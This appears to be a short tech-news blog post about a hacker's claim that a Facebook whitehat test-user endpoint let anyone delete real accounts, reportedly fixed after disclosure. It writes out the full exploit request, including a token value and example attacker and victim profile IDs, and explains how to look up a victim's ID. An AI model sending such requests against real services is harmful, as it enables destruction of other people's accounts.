Facebook Bug Leads to Delete Any users Account, Claimed By Hacker

Recently a Security Researcher and a bug Hunter,named Ehraz Ahmed claimed to found a vulnerability on Facebook

According to the researcher, he reported this bug to facebook security team, but after waiting for a long period of time, the security team replied that this bug is only for test account, where as Ehraz used it for removing real accounts and after the email from facebook security team the bug was fixed.

Ehraz also gave the proof of the bug by deleting the ”hexgroup” facebook account

facebook account hack

[badge variation=”badge-warning”]https://www.google.co.in/#q=facebook.com%2Fhexgroup+[/badge]

He said that if it was a test account it would not appear on google search. the real account can be pulled over https://www.facebook.com/hexgroup Which is now deactivated as claimed by him.

He also gave the vulnerable link

http://www.facebook.com/ajax/whitehat/delete_test_users.php?

fb_dtsg=AQA1E-WE&selected_users[0]=[Victims-Profile-ID]&__user=[Attackers-Profile-ID]&__a=1
The profile ID can be fetched over by using facebook graph

http://graph.facebook.com/USERNAME

He demoed this bug using a test profile
Name:- Rahul Agnikotri
https://www.facebook.com/hexgroup ( Victims-Profile-ID) ( Test Profile)
We can remove any account in facebook, including the celebrities.
Attackers-Profile-ID= 1781913563
Victims-Profile-ID= 100001831297334

https://www.facebook.com/ajax/whitehat/delete_test_users.php?

fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1

He also released a video on vimeo, which has viewed by entering a password.

You might be also interested in viewing “NASA’s website Hacked And Defaced, In protest of US Spring on Syria & Brazil